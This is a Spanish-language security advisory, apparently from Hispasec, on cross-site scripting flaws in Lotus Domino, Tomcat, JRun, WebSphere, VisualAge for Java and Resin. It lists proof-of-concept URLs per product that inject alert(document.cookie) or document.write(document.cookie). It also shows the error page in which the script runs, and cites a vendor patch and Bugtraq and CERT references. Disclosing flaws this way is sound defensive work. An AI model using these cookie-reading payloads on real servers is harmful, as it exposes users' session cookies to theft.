Se han descubierto vulnerabilidades de cross-site scripting en el
servidor web Domino de Lotus y en otros servidores de servlets de
Java como Tomcat, WebSphere, JRun y Resin.
Se ha descubierto que un gran número de servidores se encuentran
afectados por vulnerabilidades de cross-site scripting, que permite
que usuarios remotos creen URLs especialmente modificadas que
provoquen que código JavaScript sea ejecutado por otros usuarios.
En el servidor Lotus Domino la vulnerabilidad afecta mediante una
URL de la siguiente forma:
<a href="http://host/home.nsf/«>http://host/home.nsf/
por la que un atacante puede llegar a ejecutar código JavaScript.
La vulnerabilidad también afecta a Tomcat 3.2.1, JRun 3.0, JRun 2.3.3,
WebSphere 3.5 FP2, VisualAge for Java 3.5 Professional y Resin 1.2.2,
las URLs que permiten reproducir el problema son las siguientes:
En Tomcat 3.2.1:
<a href="http://host/jsp-mapped-dir/alert(document.cookie).jsp»>http://host/jsp-mapped-dir/alert(document.cookie).jsp
En JRun 3.0 y JRun 2.3.3:
<a href="http://host/alert(document.cookie).shtml»>http://host/alert(document.cookie).shtml
<a href="http://host/alert(document.cookie).jsp»>http://host/alert(document.cookie).jsp
<a href="http://host/alert(document.cookie).thtml»>http://host/alert(document.cookie).thtml
En WebSphere 3.5 FP2:
<a href="http://host/webapp/examples/alert(document.cookie)»>http://host/webapp/examples/alert(document.cookie)
En WebSphere 3.02:
<a href="http://host/alert(document.cookie).jsp»>http://host/alert(document.cookie).jsp
En VisualAge for Java 3.5 Professional:
<a href="http://host/alert(document.cookie)»>http://host/alert(document.cookie)
En Resin 1.2.2:
<a href="http://host/alert(document.cookie).jsp»>http://host/alert(document.cookie).jsp
<a href="http://host/document.write(document.cookie).jsp»>http://host/document.write(document.cookie).jsp
En todos los casos estas peticiones producen una salida similar
a la siguiente:
=================================================
Error 404
An error has occurred while processing request:
http://WebSphere/webapp/examples/******
Message: File not found: file://******
StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: file://******
at javax.servlet.ServletException.(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
…
=================================================
******: El código JavaScript se ejecutará aquí.
Allaire ya ha publicado un parche para evitar este problema en
las versiones afectadas de JRun.
antonior@hispasec.com
Más información:
Bugtraq:
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
http://www.securityfocus.com/archive/1/194464
Bugtraq:
Lotus Domino Server Cross-Site Scripting Vulnerability
http://www.securityfocus.com/archive/1/194465
Información sobre cross-site scripting:
http://www.cert.org/advisories/CA-2000-02.html
Aviso de seguridad y parche de Allaire sobre JRun:
http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full
Deja una respuesta